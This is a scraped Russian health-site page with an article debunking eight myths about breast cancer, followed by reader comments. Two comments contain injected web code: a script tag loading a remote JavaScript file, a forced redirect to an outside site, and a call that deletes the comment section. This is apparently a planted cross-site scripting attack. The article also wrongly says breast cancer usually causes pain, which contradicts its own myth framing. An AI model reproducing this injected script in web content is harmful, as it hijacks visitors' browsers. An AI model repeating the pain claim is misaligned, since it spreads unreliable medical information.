Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  8 мифов о раке груди  >>  8 мифов о раке груди
 
Обратная связь
 

8 мифов о раке груди

Размер шрифта
21 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Если вы нащупали уплотнение в молочной железе, не делайте поспешных выводов – лучше обратитесь к врачу. Наша статья поможет вам узнать правду о раке груди.

8 мифов о раке груди

Миф 1: уплотнение в груди – почти всегда рак

В 80% случаев уплотнение в груди – это не рак, а киста или фиброаденома. Такие уплотнения появляются и исчезают в течение менструального цикла. Каждая женщина должна ежемесячно проводить самообследование молочных желез и при необходимости немедленно обращаться к врачу.

Миф 2: если маммограмма в норме, значит все в порядке

Если у вас есть уплотнение, но маммограмма ничего не показала, вам могут понадобиться дополнительные методы обследования (магнитно-резонансная томография, ультразвуковое исследование) или повторная маммограмма. При необходимости вам выполнят биопсию – взятие образца уплотнения для определения его характера.

Миф 3: рак всегда болит

Хотя рак груди, как правило, сопровождается болевыми ощущениями, бывают исключения. Боль появляется при воспалительном раке груди, ранними симптомами которого является покраснение, отек и повышением температуры кожи молочной железы.

Миф 4: рак не может появиться при кормлении грудью

Хотя кормление грудью снижает риск развития рака груди, тем не менее, оно не дает 100% защиты. При появлении уплотнения в молочной желез во время грудного вскармливания, обязательно обратитесь к врачу.

Миф 5: рак не встречается в молодом возрасте

Рак груди может появиться в любом возрасте, хотя чаще он встречается у женщин после менопаузы или старше 50 лет. Поэтому при появлении уплотнения в груди в любом случае следует обратиться к врачу.

Миф 6: рак имеет большие размеры

Раковая опухоль может иметь различные размеры. По размеру опухоли нельзя судить о том, является ли она доброкачественной или злокачественной. Даже небольшая опухоль может оказаться раком, поэтому не стесняйтесь обратиться к врачу.

Миф 7: если уплотнение появилось сразу после маммографии, можно подождать до следующего года

Если уплотнение появилось после маммографии, которая ничего не показала, необходимо обратиться к врачу. Дело в том, что маммография не позволяет выявить все опухоли, например, при повышенной плотности ткани молочной железы или необычной локализации опухоли.

Миф 8: если в семье не было рака груди, уплотнение вряд ли окажется раком

Многие женщины наивно полагают, что отсутствие рака груди у ближайших родственников исключает возможность появления заболевания у них. Однако по данным Американского общества по изучению рака семейный анамнез имеется менее чем у 15% женщин, страдающих данным заболеванием.

Все о женском здоровье в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как Анджелина Джоли изменила наш мир?   Может ли морковка в день избавить вас от рака груди?   Как самой обследовать грудь   Что нужно женщинам?! Начинается на букву Д!  
23 июля 2013Из лысых крыс сделают лекарство от рака 26 июня 2013Что пить, чтобы не было рака груди?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Ответы на все вопросы о раке груди
Тесты для вашей любимой груди
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.